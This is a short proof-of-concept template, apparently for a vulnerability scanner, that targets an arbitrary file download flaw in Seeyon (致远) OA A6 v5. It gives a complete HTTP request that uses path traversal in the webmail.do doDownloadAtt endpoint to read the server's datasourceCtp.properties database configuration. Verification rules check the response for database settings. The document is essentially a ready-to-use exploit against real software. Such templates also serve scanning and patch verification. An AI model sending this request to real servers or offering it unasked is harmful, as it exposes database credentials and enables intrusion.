<DudePoc_Name>致远OA A6 v5 任意文件下载漏洞</DudePoc_Name>
<DudePoc_Description>致远OA A6 v5 任意文件下载漏洞</DudePoc_Description>
<DudePoc_SetHeader>
GET /seeyon/webmail.do?method=doDownloadAtt&filename=indexx.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>^(?=.*?(?:ctpDataSource.minCount|mysql.path)).*?$</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
